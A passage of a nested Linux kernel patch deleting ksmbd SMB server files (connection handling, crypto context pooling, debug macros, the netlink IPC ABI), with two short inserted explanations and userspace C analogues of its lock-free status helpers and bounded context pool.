+-		pr_err("Failed to init TCP subsystem: %d\n", ret);
+-		goto out;
+-	}
+-
+-	ret = ksmbd_rdma_init();
+-	if (ret) {
+-		pr_err("Failed to init RDMA subsystem: %d\n", ret);
+-		goto out;
+-	}
+-out:
+-	mutex_unlock(&init_lock);
+-	return ret;
+-}
+-
+-static void stop_sessions(void)
+-{
+-	struct ksmbd_conn *conn;
+-	struct ksmbd_transport *t;
+-
+-again:
+-	down_read(&conn_list_lock);
+-	list_for_each_entry(conn, &conn_list, conns_list) {
+-		struct task_struct *task;
+-
+-		t = conn->transport;
+-		task = t->handler;
+-		if (task)
+-			ksmbd_debug(CONN, "Stop session handler %s/%d\n",
+-				    task->comm, task_pid_nr(task));
+-		ksmbd_conn_set_exiting(conn);
+-		if (t->ops->shutdown) {
+-			up_read(&conn_list_lock);
+-			t->ops->shutdown(t);
+-			down_read(&conn_list_lock);
+-		}
+-	}
+-	up_read(&conn_list_lock);
+-
+-	if (!list_empty(&conn_list)) {
+-		schedule_timeout_interruptible(HZ / 10); /* 100ms */
+-		goto again;
+-	}
+-}
+-
+-void ksmbd_conn_transport_destroy(void)
+-{
+-	mutex_lock(&init_lock);
+-	ksmbd_tcp_destroy();
+-	ksmbd_rdma_destroy();
+-	stop_sessions();
+-	mutex_unlock(&init_lock);
+-}
+diff --git a/fs/ksmbd/connection.h b/fs/ksmbd/connection.h
+deleted file mode 100644
+index ad8dfaa48ffb3..0000000000000
+--- a/fs/ksmbd/connection.h
++++ /dev/null
+@@ -1,231 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0-or-later */
+-/*
+- *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
+- */
+-
+-#ifndef __KSMBD_CONNECTION_H__
+-#define __KSMBD_CONNECTION_H__
+-
+-#include <linux/list.h>
+-#include <linux/ip.h>
+-#include <net/sock.h>
+-#include <net/tcp.h>
+-#include <net/inet_connection_sock.h>
+-#include <net/request_sock.h>
+-#include <linux/kthread.h>
+-#include <linux/nls.h>
+-#include <linux/unicode.h>
+-
+-#include "smb_common.h"
+-#include "ksmbd_work.h"
+-
+-#define KSMBD_SOCKET_BACKLOG		16
+-
+-enum {
+-	KSMBD_SESS_NEW = 0,
+-	KSMBD_SESS_GOOD,
+-	KSMBD_SESS_EXITING,
+-	KSMBD_SESS_NEED_RECONNECT,
+-	KSMBD_SESS_NEED_NEGOTIATE,
+-	KSMBD_SESS_RELEASING
+-};
+-
+-struct ksmbd_stats {
+-	atomic_t			open_files_count;
+-	atomic64_t			request_served;
+-};
+-
+-struct ksmbd_transport;
+-
+-struct ksmbd_conn {
+-	struct smb_version_values	*vals;
+-	struct smb_version_ops		*ops;
+-	struct smb_version_cmds		*cmds;
+-	unsigned int			max_cmds;
+-	struct mutex			srv_mutex;
+-	int				status;
+-	unsigned int			cli_cap;
+-	char				*request_buf;
+-	struct ksmbd_transport		*transport;
+-	struct nls_table		*local_nls;
+-	struct unicode_map		*um;
+-	struct list_head		conns_list;
+-	/* smb session 1 per user */
+-	struct xarray			sessions;
+-	unsigned long			last_active;
+-	/* How many requests are currently running */
+-	atomic_t			req_running;
+-	/* References made to this Server object */
+-	atomic_t			r_count;
+-	unsigned int			total_credits;
+-	unsigned int			outstanding_credits;
+-	spinlock_t			credits_lock;
+-	wait_queue_head_t		req_running_q;
+-	wait_queue_head_t		r_count_q;
+-	/* Lock to protect the requests list */
+-	spinlock_t			request_lock;
+-	struct list_head		requests;
+-	struct list_head		async_requests;
+-	int				connection_type;
+-	struct ksmbd_stats		stats;
+-	char				ClientGUID[SMB2_CLIENT_GUID_SIZE];
+-	struct ntlmssp_auth		ntlmssp;
+-
+-	spinlock_t			llist_lock;
+-	struct list_head		lock_list;
+-
+-	struct preauth_integrity_info	*preauth_info;
+-
+-	bool				need_neg;
+-	unsigned int			auth_mechs;
+-	unsigned int			preferred_auth_mech;
+-	bool				sign;
+-	bool				use_spnego:1;
+-	__u16				cli_sec_mode;
+-	__u16				srv_sec_mode;
+-	/* dialect index that server chose */
+-	__u16				dialect;
+-
+-	char				*mechToken;
+-
+-	struct ksmbd_conn_ops	*conn_ops;
+-
+-	/* Preauth Session Table */
+-	struct list_head		preauth_sess_table;
+-
+-	struct sockaddr_storage		peer_addr;
+-
+-	/* Identifier for async message */
+-	struct ida			async_ida;
+-
+-	__le16				cipher_type;
+-	__le16				compress_algorithm;
+-	bool				posix_ext_supported;
+-	bool				signing_negotiated;
+-	__le16				signing_algorithm;
+-	bool				binding;
+-};
+-
+-struct ksmbd_conn_ops {
+-	int	(*process_fn)(struct ksmbd_conn *conn);
+-	int	(*terminate_fn)(struct ksmbd_conn *conn);
+-};
+-
+-struct ksmbd_transport_ops {
+-	int (*prepare)(struct ksmbd_transport *t);
+-	void (*disconnect)(struct ksmbd_transport *t);
+-	void (*shutdown)(struct ksmbd_transport *t);
+-	int (*read)(struct ksmbd_transport *t, char *buf,
+-		    unsigned int size, int max_retries);
+-	int (*writev)(struct ksmbd_transport *t, struct kvec *iovs, int niov,
+-		      int size, bool need_invalidate_rkey,
+-		      unsigned int remote_key);
+-	int (*rdma_read)(struct ksmbd_transport *t,
+-			 void *buf, unsigned int len,
+-			 struct smb2_buffer_desc_v1 *desc,
+-			 unsigned int desc_len);
+-	int (*rdma_write)(struct ksmbd_transport *t,
+-			  void *buf, unsigned int len,
+-			  struct smb2_buffer_desc_v1 *desc,
+-			  unsigned int desc_len);
+-};
+-
+-struct ksmbd_transport {
+-	struct ksmbd_conn		*conn;
+-	struct ksmbd_transport_ops	*ops;
+-	struct task_struct		*handler;
+-};
+-
+-#define KSMBD_TCP_RECV_TIMEOUT	(7 * HZ)
+-#define KSMBD_TCP_SEND_TIMEOUT	(5 * HZ)
+-#define KSMBD_TCP_PEER_SOCKADDR(c)	((struct sockaddr *)&((c)->peer_addr))
+-
+-extern struct list_head conn_list;
+-extern struct rw_semaphore conn_list_lock;
+-
+-bool ksmbd_conn_alive(struct ksmbd_conn *conn);
+-void ksmbd_conn_wait_idle(struct ksmbd_conn *conn, u64 sess_id);
+-struct ksmbd_conn *ksmbd_conn_alloc(void);
+-void ksmbd_conn_free(struct ksmbd_conn *conn);
+-bool ksmbd_conn_lookup_dialect(struct ksmbd_conn *c);
+-int ksmbd_conn_write(struct ksmbd_work *work);
+-int ksmbd_conn_rdma_read(struct ksmbd_conn *conn,
+-			 void *buf, unsigned int buflen,
+-			 struct smb2_buffer_desc_v1 *desc,
+-			 unsigned int desc_len);
+-int ksmbd_conn_rdma_write(struct ksmbd_conn *conn,
+-			  void *buf, unsigned int buflen,
+-			  struct smb2_buffer_desc_v1 *desc,
+-			  unsigned int desc_len);
+-void ksmbd_conn_enqueue_request(struct ksmbd_work *work);
+-int ksmbd_conn_try_dequeue_request(struct ksmbd_work *work);
+-void ksmbd_conn_init_server_callbacks(struct ksmbd_conn_ops *ops);
+-int ksmbd_conn_handler_loop(void *p);
+-int ksmbd_conn_transport_init(void);
+-void ksmbd_conn_transport_destroy(void);
+-void ksmbd_conn_lock(struct ksmbd_conn *conn);
+-void ksmbd_conn_unlock(struct ksmbd_conn *conn);
+-
+-/*
+- * WARNING
+- *
+- * This is a hack. We will move status to a proper place once we land
+- * multi-session support.
+- */
+-static inline bool ksmbd_conn_good(struct ksmbd_conn *conn)
+-{
+-	return READ_ONCE(conn->status) == KSMBD_SESS_GOOD;
+-}
+-
+-static inline bool ksmbd_conn_need_negotiate(struct ksmbd_conn *conn)
+-{
+-	return READ_ONCE(conn->status) == KSMBD_SESS_NEED_NEGOTIATE;
+-}
+-
+-static inline bool ksmbd_conn_need_reconnect(struct ksmbd_conn *conn)
+-{
+-	return READ_ONCE(conn->status) == KSMBD_SESS_NEED_RECONNECT;
+-}
+-
+-static inline bool ksmbd_conn_exiting(struct ksmbd_conn *conn)
+-{
+-	return READ_ONCE(conn->status) == KSMBD_SESS_EXITING;
+-}
+-
+-static inline bool ksmbd_conn_releasing(struct ksmbd_conn *conn)
+-{
+-	return READ_ONCE(conn->status) == KSMBD_SESS_RELEASING;
+-}
+-
+-static inline void ksmbd_conn_set_new(struct ksmbd_conn *conn)
+-{
+-	WRITE_ONCE(conn->status, KSMBD_SESS_NEW);
+-}
+-
+-static inline void ksmbd_conn_set_good(struct ksmbd_conn *conn)
+-{
+-	WRITE_ONCE(conn->status, KSMBD_SESS_GOOD);
+-}
+-
+-static inline void ksmbd_conn_set_need_negotiate(struct ksmbd_conn *conn)
+-{
+-	WRITE_ONCE(conn->status, KSMBD_SESS_NEED_NEGOTIATE);
+-}
+-
+-static inline void ksmbd_conn_set_need_reconnect(struct ksmbd_conn *conn)
+-{
+-	WRITE_ONCE(conn->status, KSMBD_SESS_NEED_RECONNECT);
+-}
+-
+-static inline void ksmbd_conn_set_exiting(struct ksmbd_conn *conn)
+-{
+-	WRITE_ONCE(conn->status, KSMBD_SESS_EXITING);
+-}
+-
+-static inline void ksmbd_conn_set_releasing(struct ksmbd_conn *conn)
+-{
+-	WRITE_ONCE(conn->status, KSMBD_SESS_RELEASING);
+-}
+-
+-void ksmbd_all_conn_set_status(u64 sess_id, u32 status);
+-#endif /* __CONNECTION_H__ */
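
The status helpers above deliberately avoid a lock: every reader goes through READ_ONCE() and every writer through WRITE_ONCE(), so accesses to the shared field cannot be torn or cached by the compiler. A rough userspace analogue with C11 relaxed atomics (an illustration, not the kernel macros):

#include <stdatomic.h>
#include <stdbool.h>
#include <stdio.h>

enum { SESS_NEW, SESS_GOOD, SESS_EXITING };

struct conn { _Atomic int status; };

static void conn_set_good(struct conn *c)
{
	atomic_store_explicit(&c->status, SESS_GOOD, memory_order_relaxed);
}

static bool conn_good(struct conn *c)
{
	return atomic_load_explicit(&c->status, memory_order_relaxed)
		== SESS_GOOD;
}

int main(void)
{
	struct conn c = { SESS_NEW };

	conn_set_good(&c);
	printf("%d\n", conn_good(&c));
	return 0;
}
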
+diff --git a/fs/ksmbd/crypto_ctx.c b/fs/ksmbd/crypto_ctx.c
+deleted file mode 100644
+index 81488d04199da..0000000000000
+--- a/fs/ksmbd/crypto_ctx.c
++++ /dev/null
+@@ -1,266 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- *   Copyright (C) 2019 Samsung Electronics Co., Ltd.
+- */
+-
+-#include <linux/kernel.h>
+-#include <linux/string.h>
+-#include <linux/err.h>
+-#include <linux/slab.h>
+-#include <linux/wait.h>
+-#include <linux/sched.h>
+-
+-#include "glob.h"
+-#include "crypto_ctx.h"
+-
+-struct crypto_ctx_list {
+-	spinlock_t		ctx_lock;
+-	int			avail_ctx;
+-	struct list_head	idle_ctx;
+-	wait_queue_head_t	ctx_wait;
+-};
+-
+-static struct crypto_ctx_list ctx_list;
+-
+-static inline void free_aead(struct crypto_aead *aead)
+-{
+-	if (aead)
+-		crypto_free_aead(aead);
+-}
+-
+-static void free_shash(struct shash_desc *shash)
+-{
+-	if (shash) {
+-		crypto_free_shash(shash->tfm);
+-		kfree(shash);
+-	}
+-}
+-
+-static struct crypto_aead *alloc_aead(int id)
+-{
+-	struct crypto_aead *tfm = NULL;
+-
+-	switch (id) {
+-	case CRYPTO_AEAD_AES_GCM:
+-		tfm = crypto_alloc_aead("gcm(aes)", 0, 0);
+-		break;
+-	case CRYPTO_AEAD_AES_CCM:
+-		tfm = crypto_alloc_aead("ccm(aes)", 0, 0);
+-		break;
+-	default:
+-		pr_err("Does not support encrypt ahead(id : %d)\n", id);
+-		return NULL;
+-	}
+-
+-	if (IS_ERR(tfm)) {
+-		pr_err("Failed to alloc encrypt aead : %ld\n", PTR_ERR(tfm));
+-		return NULL;
+-	}
+-
+-	return tfm;
+-}
+-
+-static struct shash_desc *alloc_shash_desc(int id)
+-{
+-	struct crypto_shash *tfm = NULL;
+-	struct shash_desc *shash;
+-
+-	switch (id) {
+-	case CRYPTO_SHASH_HMACMD5:
+-		tfm = crypto_alloc_shash("hmac(md5)", 0, 0);
+-		break;
+-	case CRYPTO_SHASH_HMACSHA256:
+-		tfm = crypto_alloc_shash("hmac(sha256)", 0, 0);
+-		break;
+-	case CRYPTO_SHASH_CMACAES:
+-		tfm = crypto_alloc_shash("cmac(aes)", 0, 0);
+-		break;
+-	case CRYPTO_SHASH_SHA256:
+-		tfm = crypto_alloc_shash("sha256", 0, 0);
+-		break;
+-	case CRYPTO_SHASH_SHA512:
+-		tfm = crypto_alloc_shash("sha512", 0, 0);
+-		break;
+-	default:
+-		return NULL;
+-	}
+-
+-	if (IS_ERR(tfm))
+-		return NULL;
+-
+-	shash = kzalloc(sizeof(*shash) + crypto_shash_descsize(tfm),
+-			GFP_KERNEL);
+-	if (!shash)
+-		crypto_free_shash(tfm);
+-	else
+-		shash->tfm = tfm;
+-	return shash;
+-}
+-
+-static void ctx_free(struct ksmbd_crypto_ctx *ctx)
+-{
+-	int i;
+-
+-	for (i = 0; i < CRYPTO_SHASH_MAX; i++)
+-		free_shash(ctx->desc[i]);
+-	for (i = 0; i < CRYPTO_AEAD_MAX; i++)
+-		free_aead(ctx->ccmaes[i]);
+-	kfree(ctx);
+-}
+-
+-static struct ksmbd_crypto_ctx *ksmbd_find_crypto_ctx(void)
+-{
+-	struct ksmbd_crypto_ctx *ctx;
+-
+-	while (1) {
+-		spin_lock(&ctx_list.ctx_lock);
+-		if (!list_empty(&ctx_list.idle_ctx)) {
+-			ctx = list_entry(ctx_list.idle_ctx.next,
+-					 struct ksmbd_crypto_ctx,
+-					 list);
+-			list_del(&ctx->list);
+-			spin_unlock(&ctx_list.ctx_lock);
+-			return ctx;
+-		}
+-
+-		if (ctx_list.avail_ctx > num_online_cpus()) {
+-			spin_unlock(&ctx_list.ctx_lock);
+-			wait_event(ctx_list.ctx_wait,
+-				   !list_empty(&ctx_list.idle_ctx));
+-			continue;
+-		}
+-
+-		ctx_list.avail_ctx++;
+-		spin_unlock(&ctx_list.ctx_lock);
+-
+-		ctx = kzalloc(sizeof(struct ksmbd_crypto_ctx), GFP_KERNEL);
+-		if (!ctx) {
+-			spin_lock(&ctx_list.ctx_lock);
+-			ctx_list.avail_ctx--;
+-			spin_unlock(&ctx_list.ctx_lock);
+-			wait_event(ctx_list.ctx_wait,
+-				   !list_empty(&ctx_list.idle_ctx));
+-			continue;
+-		}
+-		break;
+-	}
+-	return ctx;
+-}
+-
+-void ksmbd_release_crypto_ctx(struct ksmbd_crypto_ctx *ctx)
+-{
+-	if (!ctx)
+-		return;
+-
+-	spin_lock(&ctx_list.ctx_lock);
+-	if (ctx_list.avail_ctx <= num_online_cpus()) {
+-		list_add(&ctx->list, &ctx_list.idle_ctx);
+-		spin_unlock(&ctx_list.ctx_lock);
+-		wake_up(&ctx_list.ctx_wait);
+-		return;
+-	}
+-
+-	ctx_list.avail_ctx--;
+-	spin_unlock(&ctx_list.ctx_lock);
+-	ctx_free(ctx);
+-}
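
Taken together, ksmbd_find_crypto_ctx() and ksmbd_release_crypto_ctx() form a pool bounded by the online CPU count: takers reuse an idle context, grow the pool while it is under the limit, and otherwise sleep until a release wakes them. A condensed pthreads sketch of the same shape (single idle slot for brevity; the real code keeps a list):

#include <pthread.h>
#include <stdlib.h>

struct pool {
	pthread_mutex_t lock;
	pthread_cond_t wait;
	int avail;		/* objects currently in circulation */
	int limit;		/* cap, like num_online_cpus() above */
	void *idle;		/* single idle slot for brevity */
};

static void *pool_get(struct pool *p)
{
	void *obj;

	pthread_mutex_lock(&p->lock);
	while (!p->idle && p->avail >= p->limit)
		pthread_cond_wait(&p->wait, &p->lock);	/* sleep until a put */
	if (p->idle) {
		obj = p->idle;			/* reuse an idle object */
		p->idle = NULL;
	} else {
		p->avail++;			/* still under the cap: grow */
		obj = malloc(64);		/* stand-in for a crypto ctx */
	}
	pthread_mutex_unlock(&p->lock);
	return obj;
}

static void pool_put(struct pool *p, void *obj)
{
	pthread_mutex_lock(&p->lock);
	if (!p->idle) {
		p->idle = obj;			/* park it for the next taker */
		pthread_cond_signal(&p->wait);
	} else {
		p->avail--;			/* surplus: really free it */
		free(obj);
	}
	pthread_mutex_unlock(&p->lock);
}

int main(void)
{
	struct pool p = { PTHREAD_MUTEX_INITIALIZER, PTHREAD_COND_INITIALIZER,
			  0, 2, NULL };
	void *a = pool_get(&p);

	pool_put(&p, a);
	return 0;
}
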
+-
+-static struct ksmbd_crypto_ctx *____crypto_shash_ctx_find(int id)
+-{
+-	struct ksmbd_crypto_ctx *ctx;
+-
+-	if (id >= CRYPTO_SHASH_MAX)
+-		return NULL;
+-
+-	ctx = ksmbd_find_crypto_ctx();
+-	if (ctx->desc[id])
+-		return ctx;
+-
+-	ctx->desc[id] = alloc_shash_desc(id);
+-	if (ctx->desc[id])
+-		return ctx;
+-	ksmbd_release_crypto_ctx(ctx);
+-	return NULL;
+-}
+-
+-struct ksmbd_crypto_ctx *ksmbd_crypto_ctx_find_hmacmd5(void)
+-{
+-	return ____crypto_shash_ctx_find(CRYPTO_SHASH_HMACMD5);
+-}
+-
+-struct ksmbd_crypto_ctx *ksmbd_crypto_ctx_find_hmacsha256(void)
+-{
+-	return ____crypto_shash_ctx_find(CRYPTO_SHASH_HMACSHA256);
+-}
+-
+-struct ksmbd_crypto_ctx *ksmbd_crypto_ctx_find_cmacaes(void)
+-{
+-	return ____crypto_shash_ctx_find(CRYPTO_SHASH_CMACAES);
+-}
+-
+-struct ksmbd_crypto_ctx *ksmbd_crypto_ctx_find_sha256(void)
+-{
+-	return ____crypto_shash_ctx_find(CRYPTO_SHASH_SHA256);
+-}
+-
+-struct ksmbd_crypto_ctx *ksmbd_crypto_ctx_find_sha512(void)
+-{
+-	return ____crypto_shash_ctx_find(CRYPTO_SHASH_SHA512);
+-}
+-
+-static struct ksmbd_crypto_ctx *____crypto_aead_ctx_find(int id)
+-{
+-	struct ksmbd_crypto_ctx *ctx;
+-
+-	if (id >= CRYPTO_AEAD_MAX)
+-		return NULL;
+-
+-	ctx = ksmbd_find_crypto_ctx();
+-	if (ctx->ccmaes[id])
+-		return ctx;
+-
+-	ctx->ccmaes[id] = alloc_aead(id);
+-	if (ctx->ccmaes[id])
+-		return ctx;
+-	ksmbd_release_crypto_ctx(ctx);
+-	return NULL;
+-}
+-
+-struct ksmbd_crypto_ctx *ksmbd_crypto_ctx_find_gcm(void)
+-{
+-	return ____crypto_aead_ctx_find(CRYPTO_AEAD_AES_GCM);
+-}
+-
+-struct ksmbd_crypto_ctx *ksmbd_crypto_ctx_find_ccm(void)
+-{
+-	return ____crypto_aead_ctx_find(CRYPTO_AEAD_AES_CCM);
+-}
+-
+-void ksmbd_crypto_destroy(void)
+-{
+-	struct ksmbd_crypto_ctx *ctx;
+-
+-	while (!list_empty(&ctx_list.idle_ctx)) {
+-		ctx = list_entry(ctx_list.idle_ctx.next,
+-				 struct ksmbd_crypto_ctx,
+-				 list);
+-		list_del(&ctx->list);
+-		ctx_free(ctx);
+-	}
+-}
+-
+-int ksmbd_crypto_create(void)
+-{
+-	struct ksmbd_crypto_ctx *ctx;
+-
+-	spin_lock_init(&ctx_list.ctx_lock);
+-	INIT_LIST_HEAD(&ctx_list.idle_ctx);
+-	init_waitqueue_head(&ctx_list.ctx_wait);
+-	ctx_list.avail_ctx = 1;
+-
+-	ctx = kzalloc(sizeof(struct ksmbd_crypto_ctx), GFP_KERNEL);
+-	if (!ctx)
+-		return -ENOMEM;
+-	list_add(&ctx->list, &ctx_list.idle_ctx);
+-	return 0;
+-}
+diff --git a/fs/ksmbd/crypto_ctx.h b/fs/ksmbd/crypto_ctx.h
+deleted file mode 100644
+index 4a367c62f6536..0000000000000
+--- a/fs/ksmbd/crypto_ctx.h
++++ /dev/null
+@@ -1,66 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0-or-later */
+-/*
+- *   Copyright (C) 2019 Samsung Electronics Co., Ltd.
+- */
+-
+-#ifndef __CRYPTO_CTX_H__
+-#define __CRYPTO_CTX_H__
+-
+-#include <crypto/hash.h>
+-#include <crypto/aead.h>
+-
+-enum {
+-	CRYPTO_SHASH_HMACMD5	= 0,
+-	CRYPTO_SHASH_HMACSHA256,
+-	CRYPTO_SHASH_CMACAES,
+-	CRYPTO_SHASH_SHA256,
+-	CRYPTO_SHASH_SHA512,
+-	CRYPTO_SHASH_MAX,
+-};
+-
+-enum {
+-	CRYPTO_AEAD_AES_GCM = 16,
+-	CRYPTO_AEAD_AES_CCM,
+-	CRYPTO_AEAD_MAX,
+-};
+-
+-enum {
+-	CRYPTO_BLK_ECBDES	= 32,
+-	CRYPTO_BLK_MAX,
+-};
+-
+-struct ksmbd_crypto_ctx {
+-	struct list_head		list;
+-
+-	struct shash_desc		*desc[CRYPTO_SHASH_MAX];
+-	struct crypto_aead		*ccmaes[CRYPTO_AEAD_MAX];
+-};
+-
+-#define CRYPTO_HMACMD5(c)	((c)->desc[CRYPTO_SHASH_HMACMD5])
+-#define CRYPTO_HMACSHA256(c)	((c)->desc[CRYPTO_SHASH_HMACSHA256])
+-#define CRYPTO_CMACAES(c)	((c)->desc[CRYPTO_SHASH_CMACAES])
+-#define CRYPTO_SHA256(c)	((c)->desc[CRYPTO_SHASH_SHA256])
+-#define CRYPTO_SHA512(c)	((c)->desc[CRYPTO_SHASH_SHA512])
+-
+-#define CRYPTO_HMACMD5_TFM(c)	((c)->desc[CRYPTO_SHASH_HMACMD5]->tfm)
+-#define CRYPTO_HMACSHA256_TFM(c)\
+-				((c)->desc[CRYPTO_SHASH_HMACSHA256]->tfm)
+-#define CRYPTO_CMACAES_TFM(c)	((c)->desc[CRYPTO_SHASH_CMACAES]->tfm)
+-#define CRYPTO_SHA256_TFM(c)	((c)->desc[CRYPTO_SHASH_SHA256]->tfm)
+-#define CRYPTO_SHA512_TFM(c)	((c)->desc[CRYPTO_SHASH_SHA512]->tfm)
+-
+-#define CRYPTO_GCM(c)		((c)->ccmaes[CRYPTO_AEAD_AES_GCM])
+-#define CRYPTO_CCM(c)		((c)->ccmaes[CRYPTO_AEAD_AES_CCM])
+-
+-void ksmbd_release_crypto_ctx(struct ksmbd_crypto_ctx *ctx);
+-struct ksmbd_crypto_ctx *ksmbd_crypto_ctx_find_hmacmd5(void);
+-struct ksmbd_crypto_ctx *ksmbd_crypto_ctx_find_hmacsha256(void);
+-struct ksmbd_crypto_ctx *ksmbd_crypto_ctx_find_cmacaes(void);
+-struct ksmbd_crypto_ctx *ksmbd_crypto_ctx_find_sha512(void);
+-struct ksmbd_crypto_ctx *ksmbd_crypto_ctx_find_sha256(void);
+-struct ksmbd_crypto_ctx *ksmbd_crypto_ctx_find_gcm(void);
+-struct ksmbd_crypto_ctx *ksmbd_crypto_ctx_find_ccm(void);
+-void ksmbd_crypto_destroy(void);
+-int ksmbd_crypto_create(void);
+-
+-#endif /* __CRYPTO_CTX_H__ */
+diff --git a/fs/ksmbd/glob.h b/fs/ksmbd/glob.h
+deleted file mode 100644
+index 5b8f3e0ebdb36..0000000000000
+--- a/fs/ksmbd/glob.h
++++ /dev/null
+@@ -1,49 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0-or-later */
+-/*
+- *   Copyright (C) 2016 Namjae Jeon <linkinjeon@kernel.org>
+- *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
+- */
+-
+-#ifndef __KSMBD_GLOB_H
+-#define __KSMBD_GLOB_H
+-
+-#include <linux/ctype.h>
+-
+-#include "unicode.h"
+-#include "vfs_cache.h"
+-
+-#define KSMBD_VERSION	"3.4.2"
+-
+-extern int ksmbd_debug_types;
+-
+-#define KSMBD_DEBUG_SMB		BIT(0)
+-#define KSMBD_DEBUG_AUTH	BIT(1)
+-#define KSMBD_DEBUG_VFS		BIT(2)
+-#define KSMBD_DEBUG_OPLOCK      BIT(3)
+-#define KSMBD_DEBUG_IPC         BIT(4)
+-#define KSMBD_DEBUG_CONN        BIT(5)
+-#define KSMBD_DEBUG_RDMA        BIT(6)
+-#define KSMBD_DEBUG_ALL         (KSMBD_DEBUG_SMB | KSMBD_DEBUG_AUTH |	\
+-				KSMBD_DEBUG_VFS | KSMBD_DEBUG_OPLOCK |	\
+-				KSMBD_DEBUG_IPC | KSMBD_DEBUG_CONN |	\
+-				KSMBD_DEBUG_RDMA)
+-
+-#ifdef pr_fmt
+-#undef pr_fmt
+-#endif
+-
+-#ifdef SUBMOD_NAME
+-#define pr_fmt(fmt)	"ksmbd: " SUBMOD_NAME ": " fmt
+-#else
+-#define pr_fmt(fmt)	"ksmbd: " fmt
+-#endif
+-
+-#define ksmbd_debug(type, fmt, ...)				\
+-	do {							\
+-		if (ksmbd_debug_types & KSMBD_DEBUG_##type)	\
+-			pr_info(fmt, ##__VA_ARGS__);		\
+-	} while (0)
+-
+-#define UNICODE_LEN(x)		((x) * 2)
+-
+-#endif /* __KSMBD_GLOB_H */
+diff --git a/fs/ksmbd/ksmbd_netlink.h b/fs/ksmbd/ksmbd_netlink.h
+deleted file mode 100644
+index ce866ff159bfe..0000000000000
+--- a/fs/ksmbd/ksmbd_netlink.h
++++ /dev/null
+@@ -1,412 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0-or-later */
+-/*
+- *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
+- *
+- *   linux-ksmbd-devel@lists.sourceforge.net
+- */
+-
+-#ifndef _LINUX_KSMBD_SERVER_H
+-#define _LINUX_KSMBD_SERVER_H
+-
+-#include <linux/types.h>
+-
+-/*
+- * This is a userspace ABI to communicate data between ksmbd and the user
+- * IPC daemon using netlink. It is used to track and cache the user account
+- * DB and share configuration info from userspace.
+- *
+- *  - KSMBD_EVENT_HEARTBEAT_REQUEST(ksmbd_heartbeat)
+- *    This event is to check whether the user IPC daemon is alive. If the
+- *    daemon is dead, ksmbd keeps existing connections until they disconnect,
+- *    and new connections are denied.
+- *
+- *  - KSMBD_EVENT_STARTING_UP(ksmbd_startup_request)
+- *    This event is to receive the information that initializes the ksmbd
+- *    server from the user IPC daemon and to start the server. The global
+- *    section parameters are given from smb.conf as initialization
+- *    information.
+- *
+- *  - KSMBD_EVENT_SHUTTING_DOWN(ksmbd_shutdown_request)
+- *    This event is to shutdown ksmbd server.
+- *
+- *  - KSMBD_EVENT_LOGIN_REQUEST/RESPONSE(ksmbd_login_request/response)
+- *    This event is to get user account info from the user IPC daemon.
+- *
+- *  - KSMBD_EVENT_SHARE_CONFIG_REQUEST/RESPONSE(ksmbd_share_config_request/response)
+- *    This event is to get net share configuration info.
+- *
+- *  - KSMBD_EVENT_TREE_CONNECT_REQUEST/RESPONSE(ksmbd_tree_connect_request/response)
+- *    This event is to get session and tree connect info.
+- *
+- *  - KSMBD_EVENT_TREE_DISCONNECT_REQUEST(ksmbd_tree_disconnect_request)
+- *    This event is to send tree disconnect info to user IPC daemon.
+- *
+- *  - KSMBD_EVENT_LOGOUT_REQUEST(ksmbd_logout_request)
+- *    This event is to send logout request to user IPC daemon.
+- *
+- *  - KSMBD_EVENT_RPC_REQUEST/RESPONSE(ksmbd_rpc_command)
+- *    This event is to make DCE/RPC request like srvsvc, wkssvc, lsarpc,
+- *    samr to be processed in userspace.
+- *
+- *  - KSMBD_EVENT_SPNEGO_AUTHEN_REQUEST/RESPONSE(ksmbd_spnego_authen_request/response)
+- *    This event is to make kerberos authentication to be processed in
+- *    userspace.
+- */
+-
+-#define KSMBD_GENL_NAME		"SMBD_GENL"
+-#define KSMBD_GENL_VERSION		0x01
+-
+-#define KSMBD_REQ_MAX_ACCOUNT_NAME_SZ	48
+-#define KSMBD_REQ_MAX_HASH_SZ		18
+-#define KSMBD_REQ_MAX_SHARE_NAME	64
+-
+-/*
+- * IPC heartbeat frame to check whether user IPC daemon is alive.
+- */
+-struct ksmbd_heartbeat {
+-	__u32	handle;
+-};
+-
+-/*
+- * Global config flags.
+- */
+-#define KSMBD_GLOBAL_FLAG_INVALID		(0)
+-#define KSMBD_GLOBAL_FLAG_SMB2_LEASES		BIT(0)
+-#define KSMBD_GLOBAL_FLAG_SMB2_ENCRYPTION	BIT(1)
+-#define KSMBD_GLOBAL_FLAG_SMB3_MULTICHANNEL	BIT(2)
+-
+-/*
+- * IPC request for ksmbd server startup
+- */
+-struct ksmbd_startup_request {
+-	__u32	flags;			/* Flags for global config */
+-	__s32	signing;		/* Signing enabled */
+-	__s8	min_prot[16];		/* The minimum SMB protocol version */
+-	__s8	max_prot[16];		/* The maximum SMB protocol version */
+-	__s8	netbios_name[16];
+-	__s8	work_group[64];		/* Workgroup */
+-	__s8	server_string[64];	/* Server string */
+-	__u16	tcp_port;		/* tcp port */
+-	__u16	ipc_timeout;		/*
+-					 * specifies the number of seconds
+-					 * server will wait for the userspace to
+-					 * reply to heartbeat frames.
+-					 */
+-	__u32	deadtime;		/* Number of minutes of inactivity */
+-	__u32	file_max;		/* Limits the maximum number of open files */
+-	__u32	smb2_max_write;		/* MAX write size */
+-	__u32	smb2_max_read;		/* MAX read size */
+-	__u32	smb2_max_trans;		/* MAX trans size */
+-	__u32	share_fake_fscaps;	/*
+-					 * Support some special applications that
+-					 * make QFSINFO calls to check whether
+-					 * we set the SPARSE_FILES bit (0x40).
+-					 */
+-	__u32	sub_auth[3];		/* Subauth value for Security ID */
+-	__u32	smb2_max_credits;	/* MAX credits */
+-	__u32	smbd_max_io_size;	/* smbd read write size */
+-	__u32	max_connections;	/* Number of maximum simultaneous connections */
+-	__u32	reserved[126];		/* Reserved room */
+-	__u32	ifc_list_sz;		/* interfaces list size */
+-	__s8	____payload[];
+-};
+-
+-#define KSMBD_STARTUP_CONFIG_INTERFACES(s)	((s)->____payload)
+-
+-/*
+- * IPC request to shutdown ksmbd server.
+- */
+-struct ksmbd_shutdown_request {
+-	__s32	reserved[16];
+-};
+-
+-/*
+- * IPC user login request.
+- */
+-struct ksmbd_login_request {
